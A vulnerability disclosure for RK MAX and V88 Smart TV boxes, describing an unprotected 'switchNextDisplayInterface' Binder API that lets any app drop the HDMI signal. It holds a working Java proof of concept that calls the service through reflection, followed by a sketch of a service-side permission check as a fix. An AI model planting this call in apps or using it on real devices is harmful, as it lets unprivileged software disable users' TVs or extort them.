[Vulnerability in RK MAX and V88 SmartTV box]
I would like to report a security vulnerability in the RK MAX (build.id: MXC89L) and V88 (build.id: NHG47K) Smart TV boxes.
The vulnerability allows any app to drop the HDMI signal without holding any privilege. An unprivileged malicious app can therefore disable the basic functionality the TV box offers, or it can even be used for ransomware purposes: e.g., each time a target streaming app is launched, the malicious app can drop the signal.
The vulnerability is due to the following:
The devices introduce an unprotected custom API, "switchNextDisplayInterface", in the DisplayDeviceManagement system service. It takes one integer argument; when it is invoked with parameter = 0, the HDMI signal is dropped.
We can exploit this API as follows:
// Look up the hidden ServiceManager class and fetch the service's binder by name.
Class<?> ServiceManager = Class.forName("android.os.ServiceManager");
Method getService = ServiceManager.getMethod("getService", String.class);
IBinder mRemote = (IBinder) getService.invoke(null, "display_device_management");
Parcel localParcel1 = Parcel.obtain();
Parcel localParcel2 = Parcel.obtain();
localParcel1.writeInterfaceToken("android.os.IDisplayDeviceManagementService");
localParcel1.writeInt(0);
mRemote.transact(7, localParcel1, localParcel2, 0); // 7 corresponds to the vulnerable API
localParcel2.recycle();
localParcel1.recycle();
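
The missing control is a caller check on the service side. The sketch below is an added example, not the vendor's code or part of the original report: it shows a Binder stub that enforces a permission before handling transaction 7. The class name, the permission name and the doSwitch() hook are assumptions; the interface token and transaction code are the ones given above.

```java
import android.content.Context;
import android.os.Binder;
import android.os.Parcel;
import android.os.RemoteException;
import android.util.Log;

// Hypothetical service-side stub; the vendor's real class is not shown in the report.
public abstract class GuardedDisplayDeviceManagementService extends Binder {
    private static final String TAG = "DisplayDeviceMgmt";
    // Interface token and transaction code as given in the report.
    private static final String DESCRIPTOR = "android.os.IDisplayDeviceManagementService";
    private static final int TRANSACTION_switchNextDisplayInterface = 7;
    // Assumed permission name. It would be declared in the platform manifest with
    // protectionLevel "signature|privileged" so third-party apps cannot obtain it.
    private static final String PERMISSION =
            "com.example.permission.MANAGE_DISPLAY_INTERFACE";

    private final Context mContext;

    protected GuardedDisplayDeviceManagementService(Context context) {
        mContext = context;
    }

    // Hypothetical hook standing in for the vendor's display-switching logic.
    protected abstract void doSwitch(int displayInterface);

    @Override
    protected boolean onTransact(int code, Parcel data, Parcel reply, int flags)
            throws RemoteException {
        if (code != TRANSACTION_switchNextDisplayInterface) {
            return super.onTransact(code, data, reply, flags);
        }
        data.enforceInterface(DESCRIPTOR);
        try {
            // Throws SecurityException unless the caller holds PERMISSION.
            mContext.enforceCallingOrSelfPermission(PERMISSION,
                    "switchNextDisplayInterface requires " + PERMISSION);
        } catch (SecurityException e) {
            // Record the rejected caller so repeated attempts can be spotted in logs.
            Log.w(TAG, "Denied switchNextDisplayInterface from uid="
                    + Binder.getCallingUid() + " pid=" + Binder.getCallingPid());
            throw e;
        }
        doSwitch(data.readInt());
        if (reply != null) {
            reply.writeNoException();
        }
        return true;
    }
}
```

With this check in place, the transact() call from an app that does not hold the permission fails with a SecurityException instead of reaching the display-switching code.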